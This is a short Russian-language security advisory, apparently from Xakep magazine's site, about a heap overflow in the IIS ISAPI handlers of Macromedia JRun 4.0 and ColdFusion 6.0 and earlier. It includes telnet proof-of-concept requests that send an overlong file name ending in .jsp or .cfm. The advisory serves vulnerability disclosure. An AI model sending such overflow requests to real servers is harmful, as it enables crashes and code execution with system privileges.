Переполнение буфера в Macromedia JRun/ ColdFusion

Рекомендуем почитать:

Хакер #307. Угон сессий Windows

ISAPI обработчики Macromedia JRun и ColdFusion в IIS
подвержены переполнению динамической памяти при обработке длинных имен файлов.
При передаче имени файла размером более 4096, часть динамической памяти может быть перезаписана. Любой код, снабженный атакующим, будет выполнен с системными привилегиями. Пример:

Для JRun

telnet example.com 80
GET /[+4096 byte buffer].jsp HTTP/1.0
[enter]
[enter]

Для ColdFusion

telnet example.com 80
GET /[+4096 byte buffer].cfm HTTP/1.0
[enter]
[enter]

Уязвимость обнаружена в Macromedia Coldfusion 6.0 и
более ранних версихя (IIS ISAPI), Macromedia JRun 4.0 и
более ранних версиях (IIS ISAPI).

Переполнение буфера в Macromedia JRun/ ColdFusion

Хакер #307. Угон сессий Windows

Подпишись на наc в Telegram!

Из рубрики «Взлом»

File Inclusion и Path Traversal. Разбираем две базовые веб-уязвимости

Страж безопасности. Защищаем периметр при помощи Wazuh

Виртуальный шифр. Анализируем энкодер для VMware ESXi

Китайский дикпик. Колонка главреда

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Доходы видеопиратов упали на 4,2%

В рамках защиты от буткита BlackLotus Microsoft выпустила PowerShell-скрипт

Хакеры эксплуатируют RCE-уязвимость в Microsoft Outlook

Множество мошеннических сайтов маскируется под DeepSeek

В работе DayZ и Arma Reforger наблюдаются проблемы из-за DDoS-атаки на Bohemia Interactive